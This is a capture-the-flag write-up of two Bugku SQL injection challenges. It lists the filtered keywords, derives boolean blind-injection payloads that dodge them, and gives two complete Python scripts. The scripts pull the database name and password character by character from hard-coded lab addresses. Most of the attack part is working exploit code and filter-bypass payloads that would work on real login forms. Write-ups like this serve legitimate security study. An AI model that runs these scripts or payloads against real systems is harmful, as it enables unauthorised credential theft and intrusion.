Analysis of two Bugku filtered-injection challenges

One is the login3 challenge and the other is sql2. The two are very similar, so I am writing them up together.

Approach

The two challenges are alike in three ways:

1. Submitting a filtered character produces an "illegal character" message
2. A wrong username produces "username error" or "user does not exist"
3. A correct username produces "password error" (the password is unknown)

Solution approach:

1. Test which characters are accepted to learn what is filtered
2. Inject through the username field, using whether the page reports a username error or a password error as the oracle for a boolean-based blind injection

Both solutions involve some guessing. Because `information` (and so information_schema) is filtered, I guessed that the table holds a single row with two columns, username and password, and that the login only succeeds when both are correct (once the username check is bypassed, only the password has to match). To guess the name of the password column I looked at the page source, took the `name` attribute of the password input box and used it as the column name; that turned out to work.

sql2:

Filtered:

space
or
for
information
||
and
#
--
union
,

Since comment sequences are filtered, the injected expression is closed with a single quote instead (this works, which confirms a single-quote string context).

Construct the test payload

1'^'1'='1

The WHERE clause becomes username='1'^'1'='1', and because ^ binds tighter than =, MySQL evaluates it as username=(('1'^'1')='1'), i.e. username=(0='1'), i.e. username=0. MySQL converts operands when comparing a string with a number, and a non-numeric username converts to 0, so if

select ... where username=0;

returns the row, the page reports a password error.

So change the payload to

1'^xxx='1

where xxx is the injected condition. When xxx is true, '1'^xxx is 0 and the clause collapses to username=0 (row found, "password error"); when it is false, '1'^xxx is 1 and the clause becomes username=1 (no row, "username error"). That difference is the blind-injection oracle.

login3

Filtered:

and
like
space
=
,
for
information
union

So construct

1'or(1<>2)#

which makes the clause username='1' or (1<>2), always true, so the row is returned and the page shows a password error: the username check is bypassed.

Now use

1'or(xxx<>2)#

for the blind injection, where xxx is the expression being tested. Because = is filtered, every test is written as xxx<>n: a true condition returns the row ("password error"), while a false one, i.e. xxx equals n, matches no user ("does not exist").

Scripts

sql2

import requests

url = 'http://123.206.87.240:8007/web2/login.php'

def is_true(condition):
    # username = '1' ^ (condition) = '1' collapses to username = 0 when the
    # condition is true (row found, page says "password error") and to
    # username = 1 when it is false (no row, page says "username error").
    data = {'uname': "1'^(%s)='1" % condition, 'passwd': 'asdf'}
    req = requests.post(url, data=data)
    return 'password error' in req.text

def find_length(expr):
    # spaces, commas and comment sequences are filtered; = and parentheses are not
    for i in range(1, 50):
        if is_true('length(%s)=%d' % (expr, i)):
            return i
    return 0

def extract(expr):
    # substr(x from n) is written without the space as substr(xfrom(n))
    value = ''
    for position in range(1, find_length(expr) + 1):
        for num in range(32, 127):
            if is_true('ascii(substr(%sfrom(%d)))=%d' % (expr, position, num)):
                value += chr(num)
                print(value)
                break
    return value

print(extract('database()'))
# column name guessed from the name of the password input box in the page source
print(extract('(passwd)'))
print('over')

login3

import requests

url = 'http://123.206.31.85:49167/index.php'

def is_equal(expr, n):
    # = is filtered, so test expr<>n instead: username='1' or (expr<>n) returns
    # the row (page says "password error") unless expr equals n, in which case
    # no user matches and the page says the user does not exist.
    data = {'username': "1'or(%s<>%d)#" % (expr, n), 'password': 'asdf'}
    req = requests.post(url, data=data)
    return 'exist' in req.text

def find_length(expr):
    for num in range(1, 50):
        if is_equal('length(%s)' % expr, num):
            return num
    return 0

def extract(expr):
    # substr(x from n) is written without the space as substr(xfrom(n))
    value = ''
    for position in range(1, find_length(expr) + 1):
        for i in range(32, 127):
            if is_equal('ascii(substr(%sfrom(%d)))' % (expr, position), i):
                value += chr(i)
                print(chr(i), end='')
                break
    print()
    return value

print(extract('database()'))
# column name taken from the name attribute of the password input box
print(extract('(password)'))
print('over')